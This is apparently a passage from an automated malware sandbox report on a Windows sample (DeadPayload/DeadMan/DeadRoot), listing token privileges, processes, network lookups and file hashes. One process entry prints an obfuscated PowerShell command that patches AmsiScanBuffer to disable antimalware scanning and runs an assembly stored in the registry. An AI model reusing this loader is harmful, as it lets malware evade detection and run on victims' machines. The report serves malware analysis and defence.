| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\mousocoreworker.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe
"C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe"
C:\Users\Public\DeadMan.exe
"C:\Users\Public\DeadMan.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe fb07469b379b4fb778b85472918c9feb lFpujZW5tkKSR97ZF1zmhw.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Public\DeadRoot.exe
"C:\Users\Public\DeadRoot.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:acWoETOjQxGb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YyQWcVQKfAeWlx,[Parameter(Position=1)][Type]$LXJUQAtjvW)$ZckybrtpLYM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+'Pu'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'al'+'e'+''+[Char](100)+''+','+'A'+[Char](110)+''+'s'+''+[Char](105)+'C'+'l'+'a'+[Char](115)+''+[Char](115)+','+[Char](65)+'ut'+'o'+''+[Char](67)+'l'+[Char](97)+''+'s'+'s',[MulticastDelegate]);$ZckybrtpLYM.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+'e,'+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$YyQWcVQKfAeWlx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ZckybrtpLYM.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'By'+'S'+'ig,'+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'o'+[Char](116)+''+','+'V'+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$LXJUQAtjvW,$YyQWcVQKfAeWlx).SetImplementationFlags('Ru'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ZckybrtpLYM.CreateType();}$HoywRxmuFtDLR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+'W'+'i'+'n'+''+[Char](51)+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+'e'+'M'+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+''+'s'+'');$TJEntuyiYMxBXF=$HoywRxmuFtDLR.GetMethod('GetP'+'r'+''+[Char](111)+'c'+[Char](65)+'ddr'+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UeUHDIKLttTbZsZriOj=acWoETOjQxGb @([String])([IntPtr]);$YaUujRBqnQiEtbPpLfJXWB=acWoETOjQxGb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YPEGgrhnWxJ=$HoywRxmuFtDLR.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+'eH'+[Char](97)+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+'n'+''+'e'+''+[Char](108)+'32'+'.'+''+[Char](100)+''+'l'+''+'l'+'')));$JnInjVWUxNxbPI=$TJEntuyiYMxBXF.Invoke($Null,@([Object]$YPEGgrhnWxJ,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$IHufjlumKvVEHZpnB=$TJEntuyiYMxBXF.Invoke($Null,@([Object]$YPEGgrhnWxJ,[Object](''+'V'+''+[Char](105)+'rtu'+'a'+'l'+'P'+''+'r'+'o'+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$LBZlYWZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JnInjVWUxNxbPI,$UeUHDIKLttTbZsZriOj).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$syGwqBDXZjDbpSNml=$TJEntuyiYMxBXF.Invoke($Null,@([Object]$LBZlYWZ,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$bufXHyCrWO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IHufjlumKvVEHZpnB,$YaUujRBqnQiEtbPpLfJXWB).Invoke($syGwqBDXZjDbpSNml,[uint32]8,4,[ref]$bufXHyCrWO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$syGwqBDXZjDbpSNml,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IHufjlumKvVEHZpnB,$YaUujRBqnQiEtbPpLfJXWB).Invoke($syGwqBDXZjDbpSNml,[uint32]8,0x20,[ref]$bufXHyCrWO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('D'+'e'+'a'+[Char](100)+'s'+'t'+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1aeeffbc-4ea8-4bca-b550-0313e4889f2f}
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/2844-0-0x00007FFE55323000-0x00007FFE55325000-memory.dmp
memory/2844-1-0x0000000000890000-0x0000000000914000-memory.dmp
C:\Users\Public\DeadMan.exe
| MD5 | de5bb947d72f5167c12b02f85cb0ef32 |
| SHA1 | cb5b5b754e196ec3072816cb6e250d7dd703752b |
| SHA256 | 66f4ceed7b605df523601dc9a35ccf271be390f4c1d12772c6a047ea970081cd |
| SHA512 | 26763a5ffc87a77b7e25687d900d32baf67c9e45e51a970c683dc1499c37c52b83b5757c3929cf117af8c5fd494491e063fdf88be9609867bd98379d06e83c33 |
memory/4980-14-0x0000000000760000-0x000000000076E000-memory.dmp
memory/4980-16-0x00007FFE55320000-0x00007FFE55DE1000-memory.dmp
C:\Users\Public\DeadRoot.exe
| MD5 | b8479a23c22cf6fc456e197939284069 |
| SHA1 | b2d98cc291f16192a46f363d007e012d45c63300 |
| SHA256 | 18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f |
| SHA512 | 786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4 |
C:\Windows\Temp\__PSScriptPolicyTest_3faxxtht.2aw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4264-30-0x000001E620830000-0x000001E620852000-memory.dmp
memory/4264-35-0x000001E620C50000-0x000001E620C78000-memory.dmp
memory/4264-36-0x00007FFE73330000-0x00007FFE73525000-memory.dmp
memory/4264-37-0x00007FFE73140000-0x00007FFE731FE000-memory.dmp
memory/4228-41-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4228-43-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4228-44-0x00007FFE73330000-0x00007FFE73525000-memory.dmp
memory/4228-45-0x00007FFE73140000-0x00007FFE731FE000-memory.dmp
memory/4228-40-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4228-39-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4228-38-0x0000000140000000-0x0000000140008000-memory.dmp
memory/632-58-0x00007FFE333B0000-0x00007FFE333C0000-memory.dmp
memory/688-69-0x00007FFE333B0000-0x00007FFE333C0000-memory.dmp
memory/972-80-0x00007FFE333B0000-0x00007FFE333C0000-memory.dmp
memory/408-95-0x0000021116740000-0x0000021116767000-memory.dmp
memory/412-91-0x00007FFE333B0000-0x00007FFE333C0000-memory.dmp
memory/412-90-0x000001B2484A0000-0x000001B2484C7000-memory.dmp
memory/412-84-0x000001B2484A0000-0x000001B2484C7000-memory.dmp
memory/972-79-0x00000221035A0000-0x00000221035C7000-memory.dmp
memory/972-73-0x00000221035A0000-0x00000221035C7000-memory.dmp
memory/688-68-0x0000024B2F2B0000-0x0000024B2F2D7000-memory.dmp
memory/688-62-0x0000024B2F2B0000-0x0000024B2F2D7000-memory.dmp
memory/632-57-0x0000014A958E0000-0x0000014A95907000-memory.dmp
memory/632-51-0x0000014A958E0000-0x0000014A95907000-memory.dmp
memory/632-50-0x0000014A958E0000-0x0000014A95907000-memory.dmp
memory/632-49-0x0000014A958B0000-0x0000014A958D2000-memory.dmp
memory/4228-46-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4980-809-0x00007FFE55320000-0x00007FFE55DE1000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 4ecab513372a0ca58a80782ced6e340f |
| SHA1 | a7edaf8d8e2c8a66b0373e7bbf9d141cba38e182 |
| SHA256 | a936652b5da7dfc87c69f424682eb2a54cffcf82c2a7a240fbe312169c400a50 |
